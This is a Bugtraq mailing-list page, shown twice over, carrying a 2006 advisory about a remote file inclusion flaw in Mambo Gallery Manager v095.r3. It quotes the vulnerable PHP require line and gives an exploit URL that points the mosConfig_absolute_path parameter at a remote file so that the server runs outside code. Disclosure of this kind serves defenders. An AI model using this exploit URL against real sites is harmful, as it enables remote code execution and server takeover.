Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
Jul 28 2006 09:48PM
A-S-T2006 hotmail com
----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mos
Config_absolute_path=http://evalcode.txt
------------------------------------------------------------------------
----------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL
,SNIPER_SA,ALMOKAN3,Broken-proxy ,troq AND ALL LEZR.COM Member
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mos
Config_absolute_path=http://evalcode.txt
------------------------------------------------------------------------
----------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL
,SNIPER_SA,ALMOKAN3,Broken-proxy ,troq AND ALL LEZR.COM Member
[ reply ]